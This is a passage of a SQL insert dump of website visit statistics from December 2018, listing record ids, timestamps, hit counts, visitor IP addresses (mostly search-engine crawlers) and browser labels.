55.39.201','other'),(351562,1544752387,1,1,0,0,'54.36.148.240','other'),(351563,1544752411,1,1,0,0,'66.249.66.154','chrome'),(351564,1544752691,1,1,0,0,'66.249.66.157','chrome'),(351565,1544752693,3,3,0,0,'66.249.66.156','chrome'),(351566,1544752694,1,1,0,0,'54.36.148.26','other'),(351567,1544753040,1,1,0,0,'40.77.167.36','other'),(351568,1544753165,1,1,0,0,'54.36.149.53','other'),(351569,1544753954,6,6,0,0,'157.55.39.201','other'),(351570,1544753973,4,4,0,0,'40.77.167.149','other'),(351571,1544754014,3,3,0,0,'207.46.13.162','other'),(351572,1544754146,1,1,0,0,'66.249.66.156','chrome'),(351573,1544754172,1,1,0,0,'46.229.168.150','other'),(351574,1544754188,6,6,0,0,'40.77.167.179','other'),(351575,1544754250,2,2,0,0,'46.229.168.152','other'),(351576,1544754423,1,1,0,0,'54.36.148.250','other'),(351577,1544754910,2,2,0,0,'66.249.66.154','chrome'),(351578,1544755053,1,1,0,0,'95.163.255.167','other'),(351579,1544755056,1,1,0,0,'95.163.255.160','other'),(351580,1544755085,3,3,0,0,'5.45.207.19','other'),(351581,1544755101,1,1,0,0,'66.249.66.152','chrome'),(351582,1544755189,1,1,0,0,'5.45.207.79','other'),(351583,1544755385,6,6,0,0,'178.154.244.11','other'),(351584,1544755572,1,1,0,0,'141.8.142.103','other'),(351585,1544755652,1,1,0,0,'95.163.255.172','other'),(351586,1544755655,1,1,0,0,'95.163.255.169','other'),(351587,1544755657,1,1,0,0,'37.9.113.148','other'),(351588,1544755769,2,2,0,0,'66.249.66.156','chrome'),(351589,1544756121,1,1,0,0,'66.249.66.152','chrome'),(351590,1544756199,1,1,0,0,'66.249.66.40','chrome'),(351591,1544756205,3,3,0,0,'5.45.207.19','other'),(351592,1544756255,2,2,0,0,'5.45.207.79','other'),(351593,1544756653,2,2,0,0,'40.77.167.179','other'),(351594,1544756749,4,4,0,0,'178.154.244.11','other'),(351595,1544757331,1,1,0,0,'157.55.39.201','other'),(351596,1544757513,1,1,0,0,'46.229.168.143','other'),(351597,1544757534,1,1,0,0,'54.36.148.150','other'),(351598,1544757619,1,1,0,0,'5.45.207.79','other'),(351599,1544757657,1,1,0,0,'66.249.66.40','chrome'),(351600,1544757707,4,4,0,0,'66.249.66.152','chrome'),(351601,1544757711,1,1,0,0,'46.229.168.130','other'),(351602,1544757756,1,1,0,0,'66.249.66.44','chrome'),(351603,1544757801,3,3,0,0,'66.249.66.156','chrome'),(351604,1544757847,2,2,0,0,'40.77.167.179','other'),(351605,1544758203,2,2,0,0,'157.55.39.150','other'),(351606,1544758399,1,1,0,0,'40.77.167.204','other'),(351607,1544758422,1,1,0,0,'66.249.66.155','chrome'),(351608,1544758584,1,1,0,0,'54.36.148.42','other'),(351609,1544758702,1,1,0,0,'66.249.66.154','chrome'),(351610,1544758889,1,1,0,0,'40.77.167.149','other'),(351611,1544759037,1,1,0,0,'54.36.148.116','other'),(351612,1544759573,1,1,0,0,'66.249.66.42','chrome'),(351613,1544759607,1,1,0,0,'54.36.148.239','other'),(351614,1544759953,1,1,0,0,'46.229.168.132','other'),(351615,1544760080,1,1,0,0,'66.249.66.154','chrome'),(351616,1544760137,1,1,0,0,'54.36.148.243','other'),(351617,1544760233,1,1,0,0,'40.77.167.149','other'),(351618,1544760315,1,1,0,0,'40.77.167.59','other'),(351619,1544760322,1,1,0,0,'54.36.148.171','other'),(351620,1544760574,1,1,0,0,'54.36.148.66','other'),(351621,1544760746,2,2,0,0,'66.249.66.156','chrome'),(351622,1544760901,1,1,0,0,'46.229.168.134','other'),(351623,1544760903,1,1,0,0,'46.229.168.150','other'),(351624,1544760907,1,1,0,0,'54.36.148.86','other'),(351625,1544761311,1,1,0,0,'46.211.151.55','chrome'),(351626,1544761380,1,1,0,0,'46.229.168.146','other'),(351627,1544761550,2,2,0,0,'91.196.178.132','firefox'),(351628,1544761590,1,1,0,0,'176.193.117.127','msie'),(351629,1544762105,1,1,0,0,'54.36.149.1','other'),(351630,1544762121,2,2,0,0,'52.53.201.78','chrome'),(351631,1544762248,1,1,0,0,'157.55.39.201','other'),(351632,1544762329,1,1,0,0,'66.249.66.154','chrome'),(351633,1544762518,1,1,0,0,'8.29.198.26','other'),(351634,1544762605,1,1,0,0,'8.29.198.25','other'),(351635,1544763171,1,1,0,0,'157.55.39.201','other'),(351636,1544763410,98,98,0,0,'5.9.158.195','other'),(351637,1544763651,1,1,0,0,'66.249.66.42','chrome'),(351638,1544763703,1,1,0,0,'46.229.168.151','other'),(351639,1544763768,1,1,0,0,'40.77.167.59','other'),(351640,1544763855,1,1,0,0,'141.8.142.144','other'),(351641,1544763947,1,1,0,0,'5.45.207.79','other'),(351642,1544764124,1,1,0,0,'95.163.255.157','other'),(351643,1544764127,1,1,0,0,'95.163.255.171','other'),(351644,1544764134,1,1,0,0,'207.46.13.74','other'),(351645,1544764149,3,3,0,0,'5.45.207.19','other'),(351646,1544764246,1,1,0,0,'37.9.113.20','other'),(351647,1544764466,2,2,0,0,'5.45.207.76','other'),(351648,1544764499,1,1,0,0,'95.108.181.57','other'),(351649,1544764548,1,1,0,0,'46.229.168.154','other'),(351650,1544764599,1,1,0,0,'213.180.203.40','other'),(351651,1544764646,1,1,0,0,'157.55.39.201','other'),(351652,1544764715,2,2,0,0,'37.9.113.148','other'),(351653,1544764746,1,1,0,0,'141.8.132.16','other'),(351654,1544764748,1,1,0,0,'141.8.142.65','other'),(351655,1544764852,1,1,0,0,'5.45.207.79','other'),(351656,1544764921,1,1,0,0,'40.77.167.81','other'),(351657,1544764935,61,61,0,0,'178.63.26.114','other'),(351658,1544764964,2,2,0,0,'66.249.66.152','chrome'),(351659,1544765063,1,1,0,0,'213.180.203.48','other'),(351660,1544765138,1,1,0,0,'157.55.39.123','other'),(351661,1544765162,1,1,0,0,'66.249.66.42','chrome'),(351662,1544765186,1,1,0,0,'66.249.66.155','chrome'),(351663,1544765462,1,1,0,0,'66.249.66.156','chrome'),(351664,1544765857,1,1,0,0,'157.55.39.201','other'),(351665,1544766072,1,1,0,0,'157.55.39.123','other'),(351666,1544766150,1,1,0,0,'95.163.255.195','other'),(351667,1544766152,1,1,0,0,'95.163.255.161','other'),(351668,1544766255,1,1,0,0,'54.36.148.96','other'),(351669,1544766568,2,2,0,0,'66.249.66.157','chrome'),(351670,1544766571,3,3,0,0,'66.249.66.152','chrome'),(351671,1544766660,1,1,0,0,'46.229.168.151','other'),(351672,1544766661,1,1,0,0,'46.229.168.143','other'),(351673,1544766713,1,1,0,0,'95.163.255.112','other'),(351674,1544766752,1,1,0,0,'95.163.255.113','other'),(351675,1544766807,1,1,0,0,'95.163.255.104','other'),(351676,1544766892,2,2,0,0,'95.163.255.105','other'),(351677,1544766933,1,1,0,0,'66.249.66.155','chrome'),(351679,1544766944,1,1,0,0,'54.36.149.5','other'),(351680,1544767021,1,1,0,0,'95.163.255.118','other'),(351681,1544767042,2,2,0,0,'162.210.196.97','other'),(351682,1544767334,1,1,0,0,'66.249.66.154','chrome'),(351683,1544767379,1,1,0,0,'95.163.255.107','other'),(351684,1544767495,1,1,0,0,'54.36.148.206','other'),(351685,1544767532,1,1,0,0,'157.55.39.123','other'),(351686,1544767669,1,1,0,0,'37.52.42.133','opera'),(351687,1544767694,1,1,0,0,'54.36.148.76','other'),(351688,1544767755,1,1,0,0,'95.163.255.117','other'),(351689,1544767857,1,1,0,0,'95.163.255.112','other'),(351690,1544767902,1,1,0,0,'95.163.255.104','other'),(351691,1544768380,1,1,0,0,'46.229.168.149','other'),(351692,1544768649,1,1,0,0,'54.36.148.204','other'),(351693,1544768682,1,1,0,0,'54.36.148.115','other'),(351694,1544768924,1,1,0,0,'31.184.238.107','chrome'),(351695,1544768929,1,1,0,0,'46.229.168.146','other'),(351696,1544769012,1,1,0,0,'66.249.66.42','chrome'),(351697,1544769065,1,1,0,0,'5.188.210.53','chrome'),(351698,1544769229,1,1,0,0,'66.249.66.152','chrome'),(351699,1544769262,1,1,0,0,'46.229.168.129','other'),(351700,1544769586,1,1,0,0,'66.249.66.154','chrome'),(351701,1544769654,2,2,0,0,'91.196.178.94','chrome'),(351702,1544770060,2,2,0,0,'91.196.178.84','firefox'),(351703,1544770100,3,3,0,0,'91.196.178.169','chrome'),(351704,1544770249,1,1,0,0,'66.249.66.44','chrome'),(351705,1544770290,1,1,0,0,'66.249.66.42','chrome'),(351706,1544770678,1,1,0,0,'66.249.66.154','chrome'),(351707,1544770681,1,1,0,0,'66.249.66.156','chrome'),(351708,1544770791,1,1,0,0,'95.163.255.170','other'),(351709,1544770794,1,1,0,0,'95.163.255.166','other'),(351710,1544770888,1,1,0,0,'46.229.168.147','other'),(351711,1544771012,1,1,0,0,'95.163.255.117','other'),(351712,1544771018,1,1,0,0,'95.163.255.103','other'),(351713,1544771121,1,1,0,0,'54.36.148.149','other'),(351714,1544771244,1,1,0,0,'95.163.255.176','other'),(351715,1544771247,1,1,0,0,'95.163.255.183','other'),(351716,1544771432,1,1,0,0,'46.229.168.140','other'),(351717,1544771552,1,1,0,0,'5.188.210.53','chrome'),(351718,1544771860,1,1,0,0,'46.229.168.139','other'),(351719,1544772327,1,1,0,0,'54.36.148.238','other'),(351720,1544772350,2,2,0,0,'77.222.159.114','chrome'),(351721,1544772420,4,4,0,0,'66.249.66.152','chrome'),(351722,1544772559,3,3,0,0,'178.154.244.11','other'),(351723,1544772562,1,1,0,0,'91.196.178.175','chrome'),(351724,1544772615,1,1,0,0,'5.45.207.19','other'),(351725,1544772634,1,1,0,0,'54.36.148.189','other'),(351726,1544772667,2,2,0,0,'66.249.66.40','chrome'),(351727,1544772677,1,1,0,0,'54.36.149.12','other'),(351728,1544772732,2,2,0,0,'66.249.66.157','chrome'),(351729,1544772740,1,1,0,0,'91.196.178.71','chrome'),(351730,1544772744,1,1,0,0,'54.36.148.110','other'),(351731,1544772806,1,1,0,0,'54.36.148.39','other'),(351732,1544772810,2,2,0,0,'66.249.66.156','chrome'),(351733,1544772830,4,4,0,0,'5.45.207.79','other'),(351734,1544773049,1,1,0,0,'46.229.168.148','other'),(351735,1544773095,1,1,0,0,'54.36.149.89','other'),(351736,1544773350,2,2,0,0,'8.29.198.27','other'),(351737,1544773593,1,1,0,0,'141.8.142.103','other'),(351738,1544773839,1,1,0,0,'178.154.244.11','other'),(351739,1544773865,1,1,0,0,'54.36.148.99','other'),(351740,1544774027,2,2,0,0,'66.249.66.156','chrome'),(351741,1544774153,1,1,0,0,'54.36.149.85','other'),(351742,1544774203,1,1,0,0,'54.36.148.77','other'),(351743,1544774327,3,3,0,0,'66.249.66.154','chrome'),(351744,1544774505,1,1,0,0,'66.249.66.40','chrome'),(351745,1544774534,1,1,0,0,'94.178.137.57','chrome'),(351746,1544774558,1,1,0,0,'46.229.168.132','other'),(351747,1544774595,1,1,0,0,'157.55.39.123','other'),(351748,1544774602,1,1,0,0,'66.249.66.157','chrome'),(351749,1544774704,3,3,0,0,'91.196.177.114','chrome'),(351750,1544774844,1,1,0,0,'178.255.215.94','other'),(351751,1544774892,2,2,0,0,'91.196.178.71','chrome'),(351752,1544774898,2,2,0,0,'91.196.178.169','chrome'),(351753,1544774931,1,1,0,0,'46.229.168.141','other'),(351754,1544774933,1,1,0,0,'46.229.168.143','other'),(351755,1544775116,1,1,0,0,'54.36.148.115','other'),(351756,1544775260,2,2,0,0,'178.94.26.171','chrome'),(351757,1544775386,1,1,0,0,'66.249.66.155','chrome'),(351758,1544775387,1,1,0,0,'66.249.66.154','chrome'),(351759,1544775448,1,1,0,0,'91.196.178.84','firefox'),(351760,1544775453,316,316,0,0,'37.115.216.109','msie'),(351761,1544776028,1,1,0,0,'180.76.15.157','other'),(351762,1544776029,1,1,0,0,'180.76.15.151','other'),(351763,1544776096,3,3,0,0,'66.249.66.156','chrome'),(351764,1544776148,1,1,0,0,'66.249.66.44','chrome'),(351765,1544776562,1,1,0,0,'66.249.66.152','chrome'),(351766,1544776564,1,1,0,0,'54.36.149.59','other'),(351767,1544776827,1,1,0,0,'66.249.66.42','chrome'),(351768,1544776896,1,1,0,0,'54.36.149.98','other'),(351769,1544776969,3,3,0,0,'46.219.33.167','chrome'),(351770,1544777105,1,1,0,0,'46.229.168.129','other'),(351771,1544777119,1,1,0,0,'180.76.15.17','other'),(351772,1544777121,1,1,0,0,'180.76.15.149','other'),(351773,1544777644,2,2,0,0,'157.55.39.123','other'),(351774,1544778141,1,1,0,0,'66.249.66.154','chrome'),(351775,1544778298,1,1,0,0,'46.219.33.167','chrome'),(351776,1544778309,1,1,0,0,'54.36.148.161','other'),(351777,1544778382,1,1,0,0,'77.222.147.198','chrome'),(351778,1544778480,1,1,0,0,'46.229.168.154','other'),(351779,1544778481,1,1,0,0,'46.229.168.134','other'),(351780,1544778750,1,1,0,0,'46.229.168.150','other'),(351781,1544778865,1,1,0,0,'37.55.225.27','chrome'),(351782,1544778928,2,2,0,0,'178.154.244.11','other'),(351784,1544778929,1,1,0,0,'5.45.207.79','other'),(351785,1544779166,1,1,0,0,'178.93.57.0','firefox'),(351786,1544779926,1,1,0,0,'66.249.66.154','chrome'),(351787,1544779938,1,1,0,0,'54.36.149.49','other'),(351788,1544780138,1,1,0,0,'95.163.255.156','other'),(351789,1544780139,1,1,0,0,'54.36.148.88','other'),(351790,1544780141,1,1,0,0,'95.163.255.151','other'),(351791,1544780762,1,1,0,0,'46.229.168.137','other'),(351792,1544780800,1,1,0,0,'46.229.168.139','other'),(351793,1544780801,1,1,0,0,'46.229.168.144','other'),(351794,1544780971,1,1,0,0,'178.154.244.11','other'),(351795,1544781060,1,1,0,0,'178.154.171.24','other'),(351796,1544781257,1,1,0,0,'54.36.148.175','other'),(351797,1544781280,2,2,0,0,'5.255.253.25','other'),(351798,1544781288,1,1,0,0,'5.255.253.38','other'),(351799,1544781291,1,1,0,0,'213.180.203.61','other'),(351800,1544781298,1,1,0,0,'95.108.181.83','other'),(351801,1544781316,2,2,0,0,'141.8.142.103','other'),(351802,1544781335,1,1,0,0,'95.108.213.50','other'),(351803,1544781375,1,1,0,0,'91.124.15.15','opera'),(351804,1544781420,1,1,0,0,'128.69.144.84','msie'),(351805,1544781483,1,1,0,0,'66.249.66.156','chrome'),(351806,1544781484,2,2,0,0,'66.249.66.154','chrome'),(351807,1544781511,1,1,0,0,'5.45.207.79','other'),(351808,1544781550,1,1,0,0,'66.249.66.40','chrome'),(351809,1544781623,2,2,0,0,'66.249.66.152','chrome'),(351810,1544781696,1,1,0,0,'66.249.66.44','chrome'),(351811,1544781993,1,1,0,0,'5.45.207.19','other'),(351812,1544782179,5,5,0,0,'91.196.178.78','firefox'),(351813,1544782288,2,2,0,0,'178.133.71.170','chrome'),(351814,1544782359,1,1,0,0,'157.55.39.123','other'),(351815,1544782527,1,1,0,0,'66.249.66.154','chrome'),(351816,1544782856,1,1,0,0,'46.229.168.150','other'),(351817,1544782858,1,1,0,0,'46.229.168.148','other'),(351818,1544782875,1,1,0,0,'46.229.168.133','other'),(351819,1544783055,1,1,0,0,'95.163.255.172','other'),(351820,1544783058,1,1,0,0,'95.163.255.159','other'),(351821,1544783303,1,1,0,0,'95.163.255.96','other'),(351822,1544783309,1,1,0,0,'95.163.255.93','other'),(351823,1544783640,1,1,0,0,'91.196.178.94','chrome'),(351824,1544783665,1,1,0,0,'66.249.66.152','chrome'),(351825,1544783841,1,1,0,0,'54.36.148.233','other'),(351826,1544783919,1,1,0,0,'54.36.149.11','other'),(351827,1544783971,1,1,0,0,'66.249.66.154','chrome'),(351828,1544784054,1,1,0,0,'54.36.149.79','other'),(351829,1544784116,1,1,0,0,'46.229.168.132','other'),(351830,1544784119,1,1,0,0,'46.229.168.150','other'),(351831,1544784188,1,1,0,0,'8.29.198.25','other'),(351832,1544784244,1,1,0,0,'54.36.148.131','other'),(351833,1544784248,1,1,0,0,'54.36.149.24','other'),(351834,1544784321,1,1,0,0,'8.29.198.27','other'),(351835,1544784424,2,2,0,0,'91.196.178.78','firefox'),(351836,1544784537,1,1,0,0,'95.163.255.119','other'),(351837,1544784541,2,2,0,0,'157.55.39.201','other'),(351838,1544784615,1,1,0,0,'91.196.178.94','chrome'),(351839,1544784668,1,1,0,0,'95.163.255.107','other'),(351840,1544784850,1,1,0,0,'54.36.148.34','other'),(351841,1544785098,1,1,0,0,'95.163.255.104','other'),(351842,1544785533,1,1,0,0,'95.163.255.103','other'),(351843,1544785793,1,1,0,0,'95.163.255.115','other'),(351844,1544785987,1,1,0,0,'95.163.255.108','other'),(351845,1544786275,1,1,0,0,'91.196.178.78','firefox'),(351846,1544786360,1,1,0,0,'46.229.168.153','other'),(351847,1544786397,1,1,0,0,'157.55.39.123','other'),(351848,1544787278,1,1,0,0,'46.229.168.147','other'),(351849,1544787481,1,1,0,0,'95.163.255.106','other'),(351850,1544787488,1,1,0,0,'95.163.255.105','other'),(351851,1544787616,3,3,0,0,'178.154.244.11','other'),(351852,1544787649,5,5,0,0,'5.45.207.19','other'),(351853,1544787658,1,1,0,0,'54.36.149.30','other'),(351854,1544787672,1,1,0,0,'5.45.207.79','other'),(351855,1544788045,1,1,0,0,'95.108.181.54','other'),(351856,1544788072,1,1,0,0,'141.8.142.103','other'),(351857,1544788087,1,1,0,0,'66.249.66.154','chrome'),(351858,1544788523,1,1,0,0,'178.154.244.11','other'),(351859,1544788554,1,1,0,0,'46.229.168.132','other'),(351860,1544788596,2,2,0,0,'5.45.207.19','other'),(351861,1544788602,2,2,0,0,'91.196.178.78','firefox'),(351862,1544788697,1,1,0,0,'54.36.148.219','other'),(351863,1544788933,2,2,0,0,'157.55.39.60','other'),(351864,1544789415,2,2,0,0,'157.55.39.201','other'),(351865,1544789607,1,1,0,0,'91.196.177.15','chrome'),(351866,1544789677,1,1,0,0,'157.55.39.123','other'),(351867,1544789815,2,2,0,0,'91.242.162.17','other'),(351868,1544789894,1,1,0,0,'91.196.178.182','chrome'),(351869,1544789956,2,2,0,0,'91.196.178.78','firefox'),(351870,1544790012,1,1,0,0,'66.249.66.42','chrome'),(351871,1544790227,1,1,0,0,'77.52.210.49','chrome'),(351872,1544790350,1,1,0,0,'46.229.168.147','other'),(351873,1544790392,1,1,0,0,'157.55.39.201','other'),(351874,1544790582,1,1,0,0,'91.196.177.15','chrome'),(351875,1544791062,1,1,0,0,'66.249.66.157','chrome'),(351876,1544791079,1,1,0,0,'46.229.168.134','other'),(351877,1544791266,1,1,0,0,'157.55.39.229','other'),(351878,1544791367,1,1,0,0,'46.229.168.135','other'),(351879,1544791523,1,1,0,0,'54.36.148.69','other'),(351880,1544791601,2,2,0,0,'91.196.178.78','firefox'),(351881,1544791647,1,1,0,0,'46.229.168.137','other'),(351882,1544791938,1,1,0,0,'178.94.50.210','chrome'),(351883,1544792202,1,1,0,0,'66.249.66.156','chrome'),(351884,1544792223,2,2,0,0,'92.112.230.113','firefox'),(351885,1544792380,1,1,0,0,'66.249.66.152','chrome'),(351886,1544792555,1,1,0,0,'157.55.39.63','other'),(351887,1544793068,1,1,0,0,'77.222.156.5','firefox'),(351888,1544793129,2,2,0,0,'46.211.134.148','chrome'),(351889,1544793379,1,1,0,0,'5.45.207.79','other'),(351890,1544793480,1,1,0,0,'157.55.39.201','other'),(351891,1544793500,2,2,0,0,'130.180.217.59','chrome'),(351892,1544793688,1,1,0,0,'66.249.66.44','chrome'),(351893,1544793811,1,1,0,0,'95.132.234.51','chrome'),(351894,1544793981,1,1,0,0,'77.52.210.49','chrome'),(351895,1544794203,1,1,0,0,'157.55.39.123','other'),(351896,1544794231,1,1,0,0,'157.55.39.63','other'),(351897,1544794530,4,4,0,0,'95.134.33.184','chrome'),(351898,1544794603,1,1,0,0,'46.229.168.144','other'),(351899,1544794605,1,1,0,0,'46.229.168.146','other'),(351900,1544794760,1,1,0,0,'213.180.203.48','other'),(351901,1544795021,1,1,0,0,'46.229.168.148','other'),(351902,1544795023,1,1,0,0,'46.229.168.133','other'),(351903,1544795032,2,2,0,0,'8.29.198.26','other'),(351904,1544795064,2,2,0,0,'46.211.134.148','chrome'),(351905,1544795462,2,2,0,0,'66.249.66.156','chrome'),(351906,1544795472,2,2,0,0,'66.249.66.42','chrome'),(351907,1544795860,1,1,0,0,'66.249.66.152','chrome'),(351908,1544795862,4,4,0,0,'5.45.207.79','other'),(351909,1544795881,1,1,0,0,'37.9.113.148','other'),(351910,1544795983,6,6,0,0,'178.154.244.11','other'),(351911,1544796078,1,1,0,0,'178.95.246.220','chrome'),(351912,1544796618,1,1,0,0,'95.163.255.197','other'),(351913,1544796621,1,1,0,0,'95.163.255.192','other'),(351914,1544796686,1,1,0,0,'46.229.168.137','other'),(351915,1544796985,1,1,0,0,'46.229.168.145','other'),(351916,1544797088,1,1,0,0,'178.154.244.11','other'),(351917,1544797098,3,3,0,0,'91.196.177.15','chrome'),(351918,1544797109,2,2,0,0,'207.46.13.221','other'),(351919,1544797160,1,1,0,0,'5.45.207.19','other'),(351920,1544797175,1,1,0,0,'66.102.9.40','chrome'),(351922,1544797181,1,1,0,0,'66.249.66.152','chrome'),(351923,1544797195,1,1,0,0,'35.187.132.180','chrome'),(351924,1544797197,1,1,0,0,'35.187.132.181','chrome'),(351925,1544797677,3,3,0,0,'195.10.210.70','chrome'),(351926,1544797697,1,1,0,0,'66.249.66.44','chrome'),(351927,1544797901,1,1,0,0,'91.242.162.17','other'),(351928,1544798041,1,1,0,0,'39.104.203.143','other'),(351929,1544798171,2,2,0,0,'170.130.1.122','chrome'),(351930,1544798348,2,2,0,0,'157.55.39.201','other'),(351931,1544798523,1,1,0,0,'46.229.168.134','other'),(351932,1544798524,1,1,0,0,'46.229.168.130','other'),(351933,1544798781,2,2,0,0,'66.249.66.152','chrome'),(351934,1544798948,1,1,0,0,'95.163.255.169','other'),(351935,1544798951,1,1,0,0,'95.163.255.194','other'),(351936,1544799087,1,1,0,0,'66.249.66.157','chrome'),(351937,1544799333,1,1,0,0,'178.154.244.11','other'),(351938,1544799343,1,1,0,0,'95.163.255.188','other'),(351939,1544799346,1,1,0,0,'95.163.255.184','other'),(351940,1544799368,1,1,0,0,'66.249.66.156','chrome'),(351941,1544799535,1,1,0,0,'95.163.255.186','other'),(351942,1544799538,1,1,0,0,'95.163.255.176','other'),(351943,1544799696,1,1,0,0,'207.46.13.251','other'),(351944,1544799719,1,1,0,0,'66.249.66.152','chrome'),(351945,1544799747,1,1,0,0,'180.76.15.155','other'),(351946,1544799748,1,1,0,0,'180.76.15.142','other'),(351947,1544799929,1,1,0,0,'46.229.168.134','other'),(351948,1544800306,1,1,0,0,'37.143.92.13','chrome'),(351949,1544800402,1,1,0,0,'5.45.207.79','other'),(351950,1544800754,1,1,0,0,'66.249.66.156','chrome'),(351951,1544800768,1,1,0,0,'66.249.66.42','chrome'),(351952,1544800793,1,1,0,0,'46.229.168.137','other'),(351953,1544800950,2,2,0,0,'66.249.66.152','chrome'),(351954,1544801092,1,1,0,0,'157.55.39.143','other'),(351955,1544801182,1,1,0,0,'195.231.4.100','firefox'),(351956,1544801208,1,1,0,0,'66.249.66.154','chrome'),(351957,1544801523,1,1,0,0,'91.196.178.181','chrome'),(351958,1544802071,1,1,0,0,'157.55.39.201','other'),(351959,1544802158,1,1,0,0,'91.202.161.29','chrome'),(351960,1544802267,3,3,0,0,'66.249.66.156','chrome'),(351961,1544802327,1,1,0,0,'66.249.66.42','chrome'),(351962,1544802422,1,1,0,0,'66.249.66.40','chrome'),(351963,1544802452,1,1,0,0,'66.249.66.152','chrome'),(351964,1544802733,1,1,0,0,'95.108.213.4','other'),(351965,1544803156,2,2,0,0,'207.46.13.83','other'),(351966,1544803555,2,2,0,0,'91.196.178.88','firefox'),(351967,1544803998,1,1,0,0,'157.55.39.68','other'),(351968,1544804039,1,1,0,0,'66.249.66.44','chrome'),(351969,1544804127,2,2,0,0,'46.211.119.122','chrome'),(351970,1544804136,1,1,0,0,'66.249.66.152','chrome'),(351971,1544804379,2,2,0,0,'91.196.178.134','firefox'),(351972,1544804903,5,5,0,0,'5.45.207.19','other'),(351973,1544805042,3,3,0,0,'141.8.142.103','other'),(351974,1544805340,3,3,0,0,'5.45.207.79','other'),(351975,1544805353,1,1,0,0,'54.36.149.70','other'),(351976,1544805360,1,1,0,0,'54.36.148.126','other'),(351977,1544805390,2,2,0,0,'66.249.66.155','chrome'),(351979,1544805427,6,6,0,0,'178.154.244.11','other'),(351980,1544805737,1,1,0,0,'95.163.255.96','other'),(351981,1544805740,1,1,0,0,'95.163.255.97','other'),(351982,1544805781,2,2,0,0,'66.249.66.152','chrome'),(351983,1544805829,4,4,0,0,'5.45.207.19','other'),(351984,1544805864,1,1,0,0,'8.29.198.27','other'),(351985,1544805890,2,2,0,0,'93.78.196.112','firefox'),(351986,1544805970,1,1,0,0,'54.36.148.96','other'),(351987,1544806025,1,1,0,0,'8.29.198.25','other'),(351988,1544806037,3,3,0,0,'141.8.142.103','other'),(351989,1544806218,1,1,0,0,'46.229.168.129','other'),(351990,1544806233,1,1,0,0,'54.36.149.72','other'),(351991,1544806272,2,2,0,0,'207.46.13.221','other'),(351992,1544806295,1,1,0,0,'66.249.66.156','chrome'),(351993,1544806332,2,2,0,0,'66.249.66.42','chrome'),(351994,1544807069,2,2,0,0,'66.249.66.154','chrome'),(351995,1544807212,1,1,0,0,'178.154.171.27','other'),(351996,1544807214,1,1,0,0,'95.108.181.75','other'),(351997,1544807248,1,1,0,0,'95.108.213.4','other'),(351998,1544807365,1,1,0,0,'5.45.207.79','other'),(351999,1544807608,2,2,0,0,'95.163.255.62','other'),(352000,1544807609,1,1,0,0,'95.163.255.65','other'),(352001,1544807613,1,1,0,0,'95.163.255.69','other'),(352002,1544807710,1,1,0,0,'46.229.168.140','other'),(352003,1544807741,1,1,0,0,'5.45.207.19','other'),(352004,1544808066,1,1,0,0,'54.36.149.12','other'),(352005,1544808402,1,1,0,0,'54.36.148.22','other'),(352006,1544808435,1,1,0,0,'66.249.66.155','chrome'),(352007,1544808437,1,1,0,0,'66.249.66.152','chrome'),(352008,1544808498,1,1,0,0,'66.249.66.156','chrome'),(352009,1544808608,1,1,0,0,'54.36.148.178','other'),(352010,1544808928,1,1,0,0,'207.46.13.221','other'),(352011,1544809602,2,2,0,0,'5.45.207.79','other'),(352012,1544809636,3,3,0,0,'95.163.255.97','other'),(352013,1544809776,1,1,0,0,'95.163.255.96','other'),(352014,1544809824,1,1,0,0,'66.249.66.157','chrome'),(352015,1544809825,3,3,0,0,'66.249.66.154','chrome'),(352016,1544810011,1,1,0,0,'95.108.213.4','other'),(352017,1544810315,1,1,0,0,'46.229.168.132','other'),(352018,1544810445,1,1,0,0,'213.109.132.174','chrome'),(352019,1544810920,1,1,0,0,'178.154.244.11','other'),(352020,1544810994,1,1,0,0,'54.36.149.92','other'),(352021,1544811028,1,1,0,0,'95.108.213.4','other'),(352022,1544811029,3,3,0,0,'141.8.142.103','other'),(352023,1544811032,1,1,0,0,'5.45.207.19','other'),(352024,1544811054,2,2,0,0,'5.45.207.79','other'),(352025,1544811500,1,1,0,0,'54.36.149.48','other'),(352026,1544811762,1,0,1,0,'66.249.66.42',''),(352027,1544811900,2,2,0,0,'207.46.13.201','other'),(352028,1544812271,1,1,0,0,'54.36.148.50','other'),(352029,1544812387,1,1,0,0,'37.73.160.46','chrome'),(352030,1544812416,1,1,0,0,'109.87.227.138','firefox'),(352031,1544812531,1,1,0,0,'207.46.13.40','other'),(352032,1544812714,1,1,0,0,'66.249.66.156','chrome'),(352033,1544812715,1,1,0,0,'66.249.66.152','chrome'),(352034,1544813342,5,5,0,0,'178.154.244.11','other'),(352035,1544813443,1,1,0,0,'5.45.207.19','other'),(352036,1544813589,1,1,0,0,'66.249.66.40','chrome'),(352037,1544813651,5,5,0,0,'66.249.66.156','chrome'),(352038,1544813812,1,1,0,0,'46.229.168.149','other'),(352039,1544813896,3,3,0,0,'66.249.66.154','chrome'),(352040,1544813956,1,1,0,0,'66.249.66.44','chrome'),(352041,1544814048,1,1,0,0,'66.249.66.157','chrome'),(352042,1544814086,1,1,0,0,'66.249.66.152','chrome'),(352043,1544814338,1,1,0,0,'91.196.178.97','chrome'),(352044,1544814354,1,1,0,0,'178.154.244.11','other'),(352045,1544814591,1,1,0,0,'207.46.13.83','other'),(352046,1544814665,3,3,0,0,'46.211.26.181','chrome'),(352047,1544814831,1,1,0,0,'109.201.154.129','other'),(352048,1544814837,1,1,0,0,'109.201.154.198','other'),(352049,1544814952,1,1,0,0,'66.249.66.44','chrome'),(352050,1544814985,2,2,0,0,'66.249.66.154','chrome'),(352051,1544815001,1,1,0,0,'66.249.66.152','chrome'),(352052,1544815022,1,1,0,0,'91.196.178.103','chrome'),(352053,1544815163,2,2,0,0,'66.249.66.156','chrome'),(352054,1544815190,1,1,0,0,'95.163.255.164','other'),(352055,1544815192,1,1,0,0,'95.163.255.167','other'),(352056,1544815238,1,1,0,0,'66.249.66.155','chrome'),(352057,1544815244,1,1,0,0,'5.45.207.19','other'),(352058,1544815498,1,1,0,0,'95.163.255.165','other'),(352059,1544815501,1,1,0,0,'95.163.255.154','other'),(352060,1544815639,1,1,0,0,'91.214.85.249','chrome'),(352061,1544815789,2,2,0,0,'95.108.213.4','other'),(352062,1544815793,5,5,0,0,'178.154.244.11','other'),(352063,1544815798,1,1,0,0,'109.87.227.138','firefox'),(352064,1544815810,1,1,0,0,'54.36.149.53','other'),(352065,1544816038,1,1,0,0,'54.36.148.49','other'),(352066,1544816368,3,3,0,0,'5.45.207.79','other'),(352067,1544816476,1,1,0,0,'87.250.224.47','other'),(352068,1544816528,1,1,0,0,'66.249.66.155','chrome'),(352069,1544816529,3,3,0,0,'66.249.66.154','chrome'),(352070,1544816580,2,2,0,0,